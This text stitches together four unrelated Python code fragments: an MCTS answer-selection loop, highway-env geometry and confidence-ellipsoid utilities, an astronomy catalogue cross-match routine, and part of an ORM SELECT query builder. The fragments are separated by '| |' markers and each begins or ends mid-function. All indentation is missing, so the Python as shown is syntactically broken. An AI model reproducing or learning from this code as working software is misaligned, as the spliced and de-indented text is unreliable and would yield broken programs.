#print sum(tmp_policy.values())
prob, select_doc_id, start_node = mcts_tree.take_action(start_node)
p_data.append(prob)
listSelectedSet.append(select_doc_id)
if select_doc_id in self.end_pad:
print 'break!!!!!!!!!!!'
break
listSelectedSet_words = []
listSelectedSet = map(eval, listSelectedSet)
for idx in listSelectedSet:
listSelectedSet_words.append(p_words_list[idx])
#print 'listSelectedSet:'
#print listSelectedSet
#print 'listSelectedSet_words: '
#print listSelectedSet_words
for sample in batch['raw_data']:
#print 'str:'
strr123 = self.vocab.recover_from_ids(listSelectedSet_words, 0)
#print strr123
pred_answers.append({'question_id': sample['question_id'],
'question_type': sample['question_type'],
'answers': [''.join(strr123)],
'entity_answers': [[]],
'yesno_answers': []})
#print | |
<reponame>rvalienter90/highway-env<gh_stars>0
import copy
import importlib
import itertools
import math
from typing import Tuple, Dict, Callable, List, Optional, Union, Sequence
import matplotlib.pyplot as plt
from PIL import Image
from PIL import ImageDraw
import numpy as np
# Useful types
Vector = Union[np.ndarray, Sequence[float]]
Matrix = Union[np.ndarray, Sequence[Sequence[float]]]
Interval = Union[np.ndarray,
Tuple[Vector, Vector],
Tuple[Matrix, Matrix],
Tuple[float, float],
List[Vector],
List[Matrix],
List[float]]
def do_every(duration: float, timer: float) -> bool:
return duration < timer
def lmap(v: float, x: Interval, y: Interval) -> float:
"""Linear map of value v with range x to desired range y."""
return y[0] + (v - x[0]) * (y[1] - y[0]) / (x[1] - x[0])
def class_from_path(path: str) -> Callable:
module_name, class_name = path.rsplit(".", 1)
class_object = getattr(importlib.import_module(module_name), class_name)
return class_object
def constrain(x: float, a: float, b: float) -> np.ndarray:
return np.clip(x, a, b)
def not_zero(x: float, eps: float = 1e-2) -> float:
if abs(x) > eps:
return x
elif x >= 0:
return eps
else:
return -eps
def wrap_to_pi(x: float) -> float:
return ((x + np.pi) % (2 * np.pi)) - np.pi
def point_in_rectangle(point: Vector, rect_min: Vector, rect_max: Vector) -> bool:
"""
Check if a point is inside a rectangle
:param point: a point (x, y)
:param rect_min: x_min, y_min
:param rect_max: x_max, y_max
"""
return rect_min[0] <= point[0] <= rect_max[0] and rect_min[1] <= point[1] <= rect_max[1]
def point_in_rotated_rectangle(point: np.ndarray, center: np.ndarray, length: float, width: float, angle: float) \
-> bool:
"""
Check if a point is inside a rotated rectangle
:param point: a point
:param center: rectangle center
:param length: rectangle length
:param width: rectangle width
:param angle: rectangle angle [rad]
:return: is the point inside the rectangle
"""
c, s = np.cos(angle), np.sin(angle)
r = np.array([[c, -s], [s, c]])
ru = r.dot(point - center)
return point_in_rectangle(ru, (-length/2, -width/2), (length/2, width/2))
def point_in_ellipse(point: Vector, center: Vector, angle: float, length: float, width: float) -> bool:
"""
Check if a point is inside an ellipse
:param point: a point
:param center: ellipse center
:param angle: ellipse main axis angle
:param length: ellipse big axis
:param width: ellipse small axis
:return: is the point inside the ellipse
"""
c, s = np.cos(angle), np.sin(angle)
r = np.matrix([[c, -s], [s, c]])
ru = r.dot(point - center)
return np.sum(np.square(ru / np.array([length, width]))) < 1
def rotated_rectangles_intersect(rect1: Tuple[Vector, float, float, float],
rect2: Tuple[Vector, float, float, float]) -> bool:
"""
Do two rotated rectangles intersect?
:param rect1: (center, length, width, angle)
:param rect2: (center, length, width, angle)
:return: do they?
"""
return has_corner_inside(rect1, rect2) or has_corner_inside(rect2, rect1)
def has_corner_inside(rect1: Tuple[Vector, float, float, float],
rect2: Tuple[Vector, float, float, float]) -> bool:
"""
Check if rect1 has a corner inside rect2
:param rect1: (center, length, width, angle)
:param rect2: (center, length, width, angle)
"""
(c1, l1, w1, a1) = rect1
(c2, l2, w2, a2) = rect2
c1 = np.array(c1)
l1v = np.array([l1/2, 0])
w1v = np.array([0, w1/2])
r1_points = np.array([[0, 0],
- l1v, l1v, -w1v, w1v,
- l1v - w1v, - l1v + w1v, + l1v - w1v, + l1v + w1v])
c, s = np.cos(a1), np.sin(a1)
r = np.array([[c, -s], [s, c]])
rotated_r1_points = r.dot(r1_points.transpose()).transpose()
return any([point_in_rotated_rectangle(c1+np.squeeze(p), c2, l2, w2, a2) for p in rotated_r1_points])
def project_polygon(polygon: Vector, axis: Vector) -> Tuple[float, float]:
min_p, max_p = None, None
for p in polygon:
projected = p.dot(axis)
if min_p is None or projected < min_p:
min_p = projected
if max_p is None or projected > max_p:
max_p = projected
return min_p, max_p
def interval_distance(min_a: float, max_a: float, min_b: float, max_b: float):
"""
Calculate the distance between [minA, maxA] and [minB, maxB]
The distance will be negative if the intervals overlap
"""
return min_b - max_a if min_a < min_b else min_a - max_b
def are_polygons_intersecting(a: Vector, b: Vector,
displacement_a: Vector, displacement_b: Vector) \
-> Tuple[bool, bool, Optional[np.ndarray]]:
"""
Checks if the two polygons are intersecting.
See https://www.codeproject.com/Articles/15573/2D-Polygon-Collision-Detection
:param a: polygon A, as a list of [x, y] points
:param b: polygon B, as a list of [x, y] points
:param displacement_a: velocity of the polygon A
:param displacement_b: velocity of the polygon B
:return: are intersecting, will intersect, translation vector
"""
intersecting = will_intersect = True
min_distance = np.inf
translation, translation_axis = None, None
for polygon in [a, b]:
for p1, p2 in zip(polygon, polygon[1:]):
normal = np.array([-p2[1] + p1[1], p2[0] - p1[0]])
normal /= np.linalg.norm(normal)
min_a, max_a = project_polygon(a, normal)
min_b, max_b = project_polygon(b, normal)
if interval_distance(min_a, max_a, min_b, max_b) > 0:
intersecting = False
velocity_projection = normal.dot(displacement_a - displacement_b)
if velocity_projection < 0:
min_a += velocity_projection
else:
max_a += velocity_projection
distance = interval_distance(min_a, max_a, min_b, max_b)
if distance > 0:
will_intersect = False
if not intersecting and not will_intersect:
break
if abs(distance) < min_distance:
min_distance = abs(distance)
d = a[:-1].mean(axis=0) - b[:-1].mean(axis=0) # center difference
translation_axis = normal if d.dot(normal) > 0 else -normal
if will_intersect:
translation = min_distance * translation_axis
return intersecting, will_intersect, translation
def confidence_ellipsoid(data: Dict[str, np.ndarray], lambda_: float = 1e-5, delta: float = 0.1, sigma: float = 0.1,
param_bound: float = 1.0) -> Tuple[np.ndarray, np.ndarray, float]:
"""
Compute a confidence ellipsoid over the parameter theta, where y = theta^T phi
:param data: a dictionary {"features": [phi_0,...,phi_N], "outputs": [y_0,...,y_N]}
:param lambda_: l2 regularization parameter
:param delta: confidence level
:param sigma: noise covariance
:param param_bound: an upper-bound on the parameter norm
:return: estimated theta, Gramian matrix G_N_lambda, radius beta_N
"""
phi = np.array(data["features"])
y = np.array(data["outputs"])
g_n_lambda = 1/sigma * np.transpose(phi) @ phi + lambda_ * np.identity(phi.shape[-1])
theta_n_lambda = np.linalg.inv(g_n_lambda) @ np.transpose(phi) @ y / sigma
d = theta_n_lambda.shape[0]
beta_n = np.sqrt(2*np.log(np.sqrt(np.linalg.det(g_n_lambda) / lambda_ ** d) / delta)) + \
np.sqrt(lambda_*d) * param_bound
return theta_n_lambda, g_n_lambda, beta_n
def confidence_polytope(data: dict, parameter_box: np.ndarray) -> Tuple[np.ndarray, np.ndarray, np.ndarray, float]:
"""
Compute a confidence polytope over the parameter theta, where y = theta^T phi
:param data: a dictionary {"features": [phi_0,...,phi_N], "outputs": [y_0,...,y_N]}
:param parameter_box: a box [theta_min, theta_max] containing the parameter theta
:return: estimated theta, polytope vertices, Gramian matrix G_N_lambda, radius beta_N
"""
param_bound = np.amax(np.abs(parameter_box))
theta_n_lambda, g_n_lambda, beta_n = confidence_ellipsoid(data, param_bound=param_bound)
values, pp = np.linalg.eig(g_n_lambda)
radius_matrix = np.sqrt(beta_n) * np.linalg.inv(pp) @ np.diag(np.sqrt(1 / values))
h = np.array(list(itertools.product([-1, 1], repeat=theta_n_lambda.shape[0])))
d_theta = np.array([radius_matrix @ h_k for h_k in h])
# Clip the parameter and confidence region within the prior parameter box.
theta_n_lambda = np.clip(theta_n_lambda, parameter_box[0], parameter_box[1])
for k, _ in enumerate(d_theta):
d_theta[k] = np.clip(d_theta[k], parameter_box[0] - theta_n_lambda, parameter_box[1] - theta_n_lambda)
return theta_n_lambda, d_theta, g_n_lambda, beta_n
def is_valid_observation(y: np.ndarray, phi: np.ndarray, theta: np.ndarray, gramian: np.ndarray,
beta: float, sigma: float = 0.1) -> bool:
"""
Check if a new observation (phi, y) is valid according to a confidence ellipsoid on theta.
:param y: observation
:param phi: feature
:param theta: estimated parameter
:param gramian: Gramian matrix
:param beta: ellipsoid radius
:param sigma: noise covariance
:return: validity of the observation
"""
y_hat = np.tensordot(theta, phi, axes=[0, 0])
error = np.linalg.norm(y - y_hat)
eig_phi, _ = np.linalg.eig(phi.transpose() @ phi)
eig_g, _ = np.linalg.eig(gramian)
error_bound = np.sqrt(np.amax(eig_phi) / np.amin(eig_g)) * beta + sigma
return error < error_bound
def is_consistent_dataset(data: dict, parameter_box: np.ndarray = None) -> bool:
"""
Check whether a dataset {phi_n, y_n} is consistent
The last observation should be in the confidence ellipsoid obtained by the N-1 first observations.
:param data: a dictionary {"features": [phi_0,...,phi_N], "outputs": [y_0,...,y_N]}
:param parameter_box: a box [theta_min, theta_max] containing the parameter theta
:return: consistency of the dataset
"""
train_set = copy.deepcopy(data)
y, phi = train_set["outputs"].pop(-1), train_set["features"].pop(-1)
y, phi = np.array(y)[..., np.newaxis], np.array(phi)[..., np.newaxis]
if train_set["outputs"] and train_set["features"]:
theta, _, gramian, beta = confidence_polytope(train_set, parameter_box=parameter_box)
return is_valid_observation(y, phi, theta, gramian, beta)
else:
return True
def near_split(x, num_bins=None, size_bins=None):
"""
Split a number into several bins with near-even distribution.
You can either set the number of bins, or their size.
The sum of bins always equals the total.
:param x: number to split
:param num_bins: number of bins
:param size_bins: size of bins
:return: list of bin sizes
"""
if num_bins:
quotient, remainder = divmod(x, num_bins)
return [quotient + 1] * remainder + [quotient] * (num_bins - remainder)
elif size_bins:
return near_split(x, num_bins=int(np.ceil(x / | |
are:", amaxsize, bmaxsize)
sys.stdout.flush()
print("Finding unique sets...")
sys.stdout.flush()
alist, blist, agrplen, bgrplen = set_list(ainds, binds, asize, bsize, joint_folder_path)
# The final act of creating island groups is to clear out any sources too
# close to the edge of the catalogue -- defined by its rectangular extend.
# TODO: add flag for allowing the keeping of potentially incomplete islands
# in the main catalogue; here we default to, and only allow, their removal.
passed_check = np.lib.format.open_memmap('{}/group/passed_check.npy'.format(joint_folder_path),
mode='w+', dtype=bool, shape=(alist.shape[1],))
passed_check[:] = 0
failed_check = np.lib.format.open_memmap('{}/group/failed_check.npy'.format(joint_folder_path),
mode='w+', dtype=bool, shape=(alist.shape[1],))
failed_check[:] = 1
islelen = alist.shape[1]
num_good_checks = 0
num_a_failed_checks = 0
num_b_failed_checks = 0
for cnum in range(0, mem_chunk_num):
lowind = np.floor(islelen*cnum/mem_chunk_num).astype(int)
highind = np.floor(islelen*(cnum+1)/mem_chunk_num).astype(int)
indexmap = np.arange(lowind, highind, 1)
alist_small = alist[:, lowind:highind]
agrplen_small = agrplen[lowind:highind]
alist_small = np.asfortranarray(alist_small[:np.amax(agrplen_small), :])
alistunique_flat = np.unique(alist_small[alist_small > -1])
a_ = np.load('{}/con_cat_astro.npy'.format(a_cat_folder_path), mmap_mode='r')[
alistunique_flat]
maparray = -1*np.ones(len(a_full)+1).astype(int)
maparray[alistunique_flat] = np.arange(0, len(a_), dtype=int)
alist_1 = np.asfortranarray(maparray[alist_small.flatten()].reshape(alist_small.shape))
blist_small = blist[:, lowind:highind]
bgrplen_small = bgrplen[lowind:highind]
blist_small = np.asfortranarray(blist_small[:np.amax(bgrplen_small), :])
blistunique_flat = np.unique(blist_small[blist_small > -1])
b_ = np.load('{}/con_cat_astro.npy'.format(b_cat_folder_path), mmap_mode='r')[
blistunique_flat]
maparray = -1*np.ones(len(b_full)+1).astype(int)
maparray[blistunique_flat] = np.arange(0, len(b_), dtype=int)
blist_1 = np.asfortranarray(maparray[blist_small.flatten()].reshape(blist_small.shape))
# Here, since we know no source can be outside of extent, we can simply
# look at whether any source has a sky separation of less than max_sep
# from any of the four lines defining extent in orthogonal sky axes.
for i in range(0, alist_small.shape[1]):
subset = alist_1[:agrplen_small[i], i]
a = a_[subset]
subset = blist_1[:bgrplen_small[i], i]
b = b_[subset]
meets_min_distance = np.zeros(len(a)+len(b), bool)
# Do not check for longitudinal "extent" small separations for cases
# where all 0-360 degrees are included, as this will result in no loss
# of sources from consideration, with the 0->360 wraparound of
# coordinates. In either case if there is a small slice of sky not
# considered, however, we must remove sources near the "empty" strip.
if ax_lims[0] > 0 or ax_lims[1] < 360:
for lon in ax_lims[:2]:
is_within_dist_of_lon = (
hav_dist_constant_lat(a[:, 0], a[:, 1], lon) <= max_sep)
# Progressively update the boolean for each source in the group
# for each distance check for the four extents.
meets_min_distance[:len(a)] = (meets_min_distance[:len(a)] |
is_within_dist_of_lon)
# Similarly, if either "latitude" is set to 90 degrees, we cannot have
# lack of up-down missing sources, so we must check (individually this
# time) for whether we should skip this check.
for lat in ax_lims[2:]:
if np.abs(lat) < 90:
is_within_dist_of_lat = (np.abs(a[:, 1] - lat) <= max_sep)
meets_min_distance[:len(a)] = (meets_min_distance[:len(a)] |
is_within_dist_of_lat)
# Because all sources in BOTH catalogues must pass, we continue
# to update meets_min_distance for catalogue "b" as well.
if ax_lims[0] > 0 or ax_lims[1] < 360:
for lon in ax_lims[:2]:
is_within_dist_of_lon = (
hav_dist_constant_lat(b[:, 0], b[:, 1], lon) <= max_sep)
meets_min_distance[len(a):] = (meets_min_distance[len(a):] |
is_within_dist_of_lon)
for lat in ax_lims[2:]:
if np.abs(lat) < 90:
is_within_dist_of_lat = (np.abs(b[:, 1] - lat) <= max_sep)
meets_min_distance[len(a):] = (meets_min_distance[len(a):] |
is_within_dist_of_lat)
if np.all(meets_min_distance == 0):
passed_check[indexmap[i]] = 1
failed_check[indexmap[i]] = 0
num_good_checks += 1
else:
# While "good" islands just need their total number incrementing
# for the group, "failed" islands we need to track the number of
# sources in each catalogue for.
num_a_failed_checks += len(a)
num_b_failed_checks += len(b)
# If set_list returned any rejected sources, then add any sources too close
# to match extent to those now. Ensure that we only reject the unique source IDs
# across each island group, ignoring the "default" -1 index.
if os.path.isfile('{}/reject/areject.npy'.format(joint_folder_path)):
a_first_rejected_len = len(np.load('{}/reject/areject.npy'.format(joint_folder_path),
mmap_mode='r'))
else:
a_first_rejected_len = 0
if num_a_failed_checks + a_first_rejected_len > 0:
reject_a = np.lib.format.open_memmap(
'{}/reject/reject_a.npy'.format(joint_folder_path), mode='w+', dtype=int,
shape=(num_a_failed_checks+a_first_rejected_len,))
if os.path.isfile('{}/reject/areject.npy'.format(joint_folder_path)):
reject_a[num_a_failed_checks:] = np.load('{}/reject/areject.npy'.format(joint_folder_path),
mmap_mode='r')
os.remove('{}/reject/areject.npy'.format(joint_folder_path))
if os.path.isfile('{}/reject/breject.npy'.format(joint_folder_path)):
b_first_rejected_len = len(np.load('{}/reject/breject.npy'.format(joint_folder_path),
mmap_mode='r'))
else:
b_first_rejected_len = 0
if num_b_failed_checks + b_first_rejected_len > 0:
reject_b = np.lib.format.open_memmap(
'{}/reject/reject_b.npy'.format(joint_folder_path), mode='w+', dtype=int,
shape=(num_b_failed_checks+b_first_rejected_len,))
if os.path.isfile('{}/reject/breject.npy'.format(joint_folder_path)):
reject_b[num_b_failed_checks:] = np.load('{}/reject/breject.npy'.format(joint_folder_path),
mmap_mode='r')
os.remove('{}/reject/breject.npy'.format(joint_folder_path))
di = max(1, len(agrplen) // 20)
amaxlen, bmaxlen = 0, 0
for i in range(0, len(agrplen), di):
if np.sum(passed_check[i:i+di]) > 0:
amaxlen = max(amaxlen, int(np.amax(agrplen[i:i+di][passed_check[i:i+di]])))
bmaxlen = max(bmaxlen, int(np.amax(bgrplen[i:i+di][passed_check[i:i+di]])))
new_alist = np.lib.format.open_memmap(
'{}/group/alist2.npy'.format(joint_folder_path), mode='w+', dtype=int,
shape=(amaxlen, num_good_checks), fortran_order=True)
new_blist = np.lib.format.open_memmap(
'{}/group/blist2.npy'.format(joint_folder_path), mode='w+', dtype=int,
shape=(bmaxlen, num_good_checks), fortran_order=True)
new_agrplen = np.lib.format.open_memmap('{}/group/agrplen2.npy'.format(joint_folder_path),
mode='w+', dtype=int, shape=(num_good_checks,))
new_bgrplen = np.lib.format.open_memmap('{}/group/bgrplen2.npy'.format(joint_folder_path),
mode='w+', dtype=int, shape=(num_good_checks,))
a_fail_count, b_fail_count, pass_count = 0, 0, 0
di = max(1, alist.shape[1] // 20)
for i in range(0, alist.shape[1], di):
# This should, in a memory-friendly way, basically boil down to being
# reject_a = alist[:, failed_check]; reject_a = reject_a[reject_a > -1].
failed_check_cut = failed_check[i:i+di]
alist_cut = alist[:, i:i+di][:, failed_check_cut]
alist_cut = alist_cut[alist_cut > -1]
blist_cut = blist[:, i:i+di][:, failed_check_cut]
blist_cut = blist_cut[blist_cut > -1]
if len(alist_cut) > 0:
reject_a[a_fail_count:a_fail_count+len(alist_cut)] = alist_cut
a_fail_count += len(alist_cut)
if len(blist_cut) > 0:
reject_b[b_fail_count:b_fail_count+len(blist_cut)] = blist_cut
b_fail_count += len(blist_cut)
# This should basically be alist = alist[:, passed_check] and
# agrplen = agrplen[passed_check], simply removing those above failed
# islands from the list, analagous to the same functionality in set_list.
n_extra = int(np.sum(passed_check[i:i+di]))
new_alist[:, pass_count:pass_count+n_extra] = alist[:, i:i+di][:amaxlen,
passed_check[i:i+di]]
new_blist[:, pass_count:pass_count+n_extra] = blist[:, i:i+di][:bmaxlen,
passed_check[i:i+di]]
new_agrplen[pass_count:pass_count+n_extra] = agrplen[i:i+di][passed_check[i:i+di]]
new_bgrplen[pass_count:pass_count+n_extra] = bgrplen[i:i+di][passed_check[i:i+di]]
pass_count += n_extra
for cat_kind in ['a', 'b']:
os.system('mv {}/group/{}list2.npy {}/group/{}list.npy'.format(
joint_folder_path, cat_kind, joint_folder_path, cat_kind))
os.system('mv {}/group/{}grplen2.npy {}/group/{}grplen.npy'.format(
joint_folder_path, cat_kind, joint_folder_path, cat_kind))
os.remove('{}/group/passed_check.npy'.format(joint_folder_path))
os.remove('{}/group/failed_check.npy'.format(joint_folder_path))
return
def _load_fourier_grid_cutouts(a, sky_rect_coords, joint_folder_path, cat_folder_path,
auf_folder_path, padding, cat_name, memmap_slice_arrays):
'''
Function to load a sub-set of a given catalogue's astrometry, slicing it
in a given sky coordinate rectangle, and load the appropriate sub-array
of the perturbation AUF's fourier-space PDF.
Parameters
----------
a : numpy.ndarray
Array containing the full entries for a given catalogue.
sky_rect_coords : numpy.ndarray or list
Array with the rectangular extents of the cutout to be performed, in the
order lower longitudinal coordinate, upper longitudinal coordinate,
lower latitudinal coordinate, and upper latitudinal coordinate.
joint_folder_path : string
Folder on disk indicating where to store files related to the joint
cross-match being performed.
cat_folder_path : string
Location on disk where catalogues for the same dataset given in ``a``
are stored.
auf_folder_path : string
Folder on disk for where catalogue ``a``'s perturbation AUF components
are saved.
padding : float
Maximum allowed sky separation the "wrong" side of ``sky_rect_coords``,
allowing for an increase in sky box size which ensures that all overlaps
get caught in ``get_max_overlap`` and ``get_max_indices``.
cat_name : string
String indicating whether we are loading cutouts from catalogue "a" or
"b".
memmap_slice_arrays : list of numpy.ndarray
List of the memmap sky slice arrays, to be used in the loading of the
rectangular sky patch.
'''
lon1, lon2, lat1, lat2 = sky_rect_coords
sky_cut = _load_rectangular_slice(joint_folder_path, cat_name, a, lon1, lon2,
lat1, lat2, padding, memmap_slice_arrays)
a_cutout = np.load('{}/con_cat_astro.npy'.format(cat_folder_path), mmap_mode='r')[sky_cut]
modrefind = np.load('{}/modelrefinds.npy'.format(auf_folder_path), mmap_mode='r')[:, sky_cut]
[fouriergrid], modrefindsmall = load_small_ref_auf_grid(modrefind, auf_folder_path,
['fourier'])
return a_cutout, fouriergrid, modrefindsmall, sky_cut
def _clean_overlaps(inds, size, joint_folder_path, filename):
'''
Convenience function to parse either catalogue's indices array for
duplicate references to the opposing array on a per-source basis,
and filter duplications in the memmapped file.
Parameters
----------
inds : numpy.ndarray
Array containing the indices of overlap between this catalogue, for each
source, and the opposing catalogue, including potential duplication.
size : numpy.ndarray
Array containing the number of overlaps between this catalogue and the
opposing catalogue prior to duplication removal.
joint_folder_path : string
The top-level folder containing the "group" folder into which the
index arrays are saved.
filename : string
The name of the ``inds`` array saved to disk.
Returns
-------
inds : numpy.ndarray
The unique indices of overlap into the opposing catalogue for each
source in a given catalogue, stripped of potential duplicates.
size : numpy.ndarray
Newly updated ``size`` array, containing the lengths of the unique
indices of overlap into the opposing catalogue for each source.
'''
maxsize = 0
size[:] = 0
for i in range(0, inds.shape[1]):
q = np.unique(inds[inds[:, i] > -1, i])
y = len(q)
inds[:y, i] = q
inds[y:, i] = -1
if y > maxsize:
maxsize = y
size[i] = y
# | |
isinstance(clause, (tuple, list)):
flattened.extend(clause)
else:
flattened.append(clause)
return flattened
def parse_node(self, node, alias_map):
query = []
query_data = []
for child in node.children:
if isinstance(child, Q):
parsed, data = self.parse_q(child, alias_map)
query.append(parsed)
query_data.extend(data)
elif isinstance(child, R):
parsed, data = self.parse_r(child, alias_map)
query.append(parsed % tuple(self.interpolation for o in data))
query_data.extend(data)
elif isinstance(child, Node):
parsed, data = self.parse_node(child, alias_map)
query.append('(%s)' % parsed)
query_data.extend(data)
connector = ' %s ' % node.connector
query = connector.join(query)
if node.negated:
query = 'NOT (%s)' % query
return query, query_data
def parse_q(self, q, alias_map):
model = q.model or self.model
query = []
query_data = []
parsed = self.parse_query_args(model, **q.query)
for (name, lookup) in parsed:
operation, value = lookup
if isinstance(value, SelectQuery):
sql, value = self.convert_subquery(value)
operation = operation % sql
if isinstance(value, F):
f_model = value.model or model
operation = operation % self.parse_f(value, f_model, alias_map)
else:
query_data.append(value)
combined = self.combine_field(alias_map[model], name)
query.append('%s %s' % (combined, operation))
if len(query) > 1:
query = '(%s)' % (' AND '.join(query))
else:
query = query[0]
if q.negated:
query = 'NOT %s' % query
return query, query_data
def parse_f(self, f_object, model, alias_map):
combined = self.combine_field(alias_map[model], f_object.field)
if f_object.op is not None:
combined = '(%s %s %s)' % (combined, f_object.op, f_object.value)
return combined
def parse_r(self, r_object, alias_map):
return r_object.sql_where()
def convert_subquery(self, subquery):
orig_query = subquery.query
if subquery.query == '*':
subquery.query = subquery.model._meta.pk_name
subquery.force_alias, orig_alias = True, subquery.force_alias
sql, data = subquery.sql()
subquery.query = orig_query
subquery.force_alias = orig_alias
return sql, data
def sorted_models(self, alias_map):
return [
(model, alias) \
for (model, alias) in sorted(alias_map.items(), key=lambda i: i[1])
]
def sql(self):
raise NotImplementedError
def execute(self):
raise NotImplementedError
def raw_execute(self, query, params):
return self.database.execute(query, params, self.require_commit)
class RawQuery(BaseQuery):
def __init__(self, model, query, *params):
self._sql = query
self._params = list(params)
super(RawQuery, self).__init__(model)
def clone(self):
return RawQuery(self.model, self._sql, *self._params)
def sql(self):
return self._sql, self._params
def execute(self):
return QueryResultWrapper(self.model, self.raw_execute(*self.sql()))
def join(self):
raise AttributeError('Raw queries do not support joining programmatically')
def where(self):
raise AttributeError('Raw queries do not support querying programmatically')
def switch(self):
raise AttributeError('Raw queries do not support switching contexts')
def __iter__(self):
return iter(self.execute())
class SelectQuery(BaseQuery):
require_commit = False
def __init__(self, model, query=None):
self.query = query or '*'
self._group_by = []
self._having = []
self._order_by = []
self._limit = None
self._offset = None
self._distinct = False
self._qr = None
self._for_update = False
self._naive = False
super(SelectQuery, self).__init__(model)
def clone(self):
query = SelectQuery(self.model, self.query)
query.query_context = self.query_context
query._group_by = list(self._group_by)
query._having = list(self._having)
query._order_by = list(self._order_by)
query._limit = self._limit
query._offset = self._offset
query._distinct = self._distinct
query._qr = self._qr
query._for_update = self._for_update
query._naive = self._naive
query._where = self.clone_where()
query._where_models = set(self._where_models)
query._joined_models = self._joined_models.copy()
query._joins = self.clone_joins()
query._table_alias = dict(self._table_alias)
return query
@returns_clone
def paginate(self, page, paginate_by=20):
if page > 0:
page -= 1
self._limit = paginate_by
self._offset = page * paginate_by
@returns_clone
def limit(self, num_rows):
self._limit = num_rows
@returns_clone
def offset(self, num_rows):
self._offset = num_rows
@returns_clone
def for_update(self, for_update=True):
self._for_update = for_update
def count(self):
if self._distinct or self._group_by:
return self.wrapped_count()
clone = self.order_by()
clone._limit = clone._offset = None
if clone.use_aliases():
clone.query = 'COUNT(t1.%s)' % (clone.model._meta.pk_col)
else:
clone.query = 'COUNT(%s)' % (clone.model._meta.pk_col)
res = clone.database.execute(*clone.sql(), require_commit=False)
return (res.fetchone() or [0])[0]
def wrapped_count(self):
clone = self.order_by()
clone._limit = clone._offset = None
sql, params = clone.sql()
query = 'SELECT COUNT(1) FROM (%s) AS wrapped_select' % sql
res = clone.database.execute(query, params, require_commit=False)
return res.fetchone()[0]
@returns_clone
def group_by(self, *clauses):
model = self.query_context
for clause in clauses:
if isinstance(clause, basestring):
fields = (clause,)
elif isinstance(clause, (list, tuple)):
fields = clause
elif issubclass(clause, Model):
model = clause
fields = clause._meta.get_field_names()
self._group_by.append((model, fields))
@returns_clone
def having(self, *clauses):
self._having = clauses
@returns_clone
def distinct(self):
self._distinct = True
@returns_clone
def order_by(self, *clauses):
order_by = []
for clause in clauses:
if isinstance(clause, tuple):
if len(clause) == 3:
model, field, ordering = clause
elif len(clause) == 2:
if isinstance(clause[0], basestring):
model = self.query_context
field, ordering = clause
else:
model, field = clause
ordering = 'ASC'
else:
raise ValueError('Incorrect arguments passed in order_by clause')
elif isinstance(clause, basestring):
model = self.query_context
field = clause
ordering = 'ASC'
elif isinstance(clause, Field):
model = clause.model
field = clause.name
ordering = 'ASC'
else:
raise ValueError('Unknown value passed in to order_by')
order_by.append(
(model, field, ordering)
)
self._order_by = order_by
def exists(self):
clone = self.paginate(1, 1)
clone.query = '(1) AS a'
curs = self.database.execute(*clone.sql(), require_commit=False)
return bool(curs.fetchone())
def get(self, *args, **kwargs):
orig_ctx = self.query_context
self.query_context = self.model
query = self.where(*args, **kwargs).paginate(1, 1)
try:
obj = query.execute().next()
return obj
except StopIteration:
raise self.model.DoesNotExist('instance matching query does not exist:\nSQL: %s\nPARAMS: %s' % (
query.sql()
))
finally:
self.query_context = orig_ctx
def filter(self, *args, **kwargs):
return filter_query(self, *args, **kwargs)
def annotate(self, related_model, aggregation=None):
return annotate_query(self, related_model, aggregation)
def aggregate(self, func):
clone = self.order_by()
clone.query = [func]
curs = self.database.execute(*clone.sql(), require_commit=False)
return curs.fetchone()[0]
@returns_clone
def naive(self, make_naive=True):
self._naive = make_naive
def parse_select_query(self, alias_map):
q = self.query
models_queried = 0
local_columns = True
if isinstance(q, (list, tuple)):
q = {self.model: self.query}
elif isinstance(q, basestring):
# convert '*' and primary key lookups
if q == '*':
q = {self.model: self.model._meta.get_field_names()}
elif q in (self.model._meta.pk_col, self.model._meta.pk_name):
q = {self.model: [self.model._meta.pk_name]}
else:
return q, [], [], False
# by now we should have a dictionary if a valid type was passed in
if not isinstance(q, dict):
raise TypeError('Unknown type encountered parsing select query')
# gather aliases and models
sorted_models = self.sorted_models(alias_map)
# normalize if we are working with a dictionary
columns = []
model_cols = []
sparams = []
for model, alias in sorted_models:
if model not in q:
continue
models_queried += 1
if '*' in q[model]:
idx = q[model].index('*')
q[model] = q[model][:idx] + model._meta.get_field_names() + q[model][idx+1:]
for clause in q[model]:
if hasattr(clause, 'sql_select'):
clause = clause.sql_select(model)
if isinstance(clause, tuple):
local_columns = False
if len(clause) > 3:
template, col_name, col_alias = clause[:3]
cparams = clause[3:]
column = model._meta.get_column(col_name)
columns.append(template % \
(self.safe_combine(model, alias, column), col_alias)
)
sparams.extend(cparams)
model_cols.append((model, (template, column, col_alias)))
elif len(clause) == 3:
func, col_name, col_alias = clause
column = model._meta.get_column(col_name)
columns.append('%s(%s) AS %s' % \
(func, self.safe_combine(model, alias, column), col_alias)
)
model_cols.append((model, (func, column, col_alias)))
elif len(clause) == 2:
col_name, col_alias = clause
column = model._meta.get_column(col_name)
columns.append('%s AS %s' % \
(self.safe_combine(model, alias, column), col_alias)
)
model_cols.append((model, (column, col_alias)))
else:
raise ValueError('Unknown type in select query')
else:
column = model._meta.get_column(clause)
columns.append(self.safe_combine(model, alias, column))
model_cols.append((model, column))
return ', '.join(columns), model_cols, sparams, (models_queried == 1 and local_columns)
def sql_meta(self):
joins, clauses, alias_map = self.compile_where()
where, where_data = self.flatten_clauses(clauses)
table = self.qn(self.model._meta.db_table)
params = []
group_by = []
use_aliases = self.use_aliases()
if use_aliases:
table = '%s AS %s' % (table, alias_map[self.model])
for model, clause in self._group_by:
if use_aliases:
alias = alias_map[model]
else:
alias = ''
for field in clause:
group_by.append(self.safe_combine(model, alias, field))
parsed_query, model_cols, sparams, simple = self.parse_select_query(alias_map)
params.extend(sparams)
query_meta = {
'columns': model_cols,
'graph': self._joins,
'simple': simple,
}
if self._distinct:
sel = 'SELECT DISTINCT'
else:
sel = 'SELECT'
select = '%s %s FROM %s' % (sel, parsed_query, table)
joins = '\n'.join(joins)
where = ' AND '.join(where)
group_by = ', '.join(group_by)
having = ' AND '.join(self._having)
order_by = []
for piece in self._order_by:
model, field, ordering = piece
if use_aliases:
alias = alias_map[model]
else:
alias = ''
order_by.append('%s %s' % (self.safe_combine(model, alias, field), ordering))
pieces = [select]
if joins:
pieces.append(joins)
if where:
pieces.append('WHERE %s' % where)
params.extend(self.convert_where_to_params(where_data))
if group_by:
pieces.append('GROUP BY %s' % group_by)
if having:
pieces.append('HAVING %s' % having)
if order_by:
pieces.append('ORDER BY %s' % ', '.join(order_by))
if self._limit:
pieces.append('LIMIT %d' % self._limit)
if self._offset:
pieces.append('OFFSET %d' % self._offset)
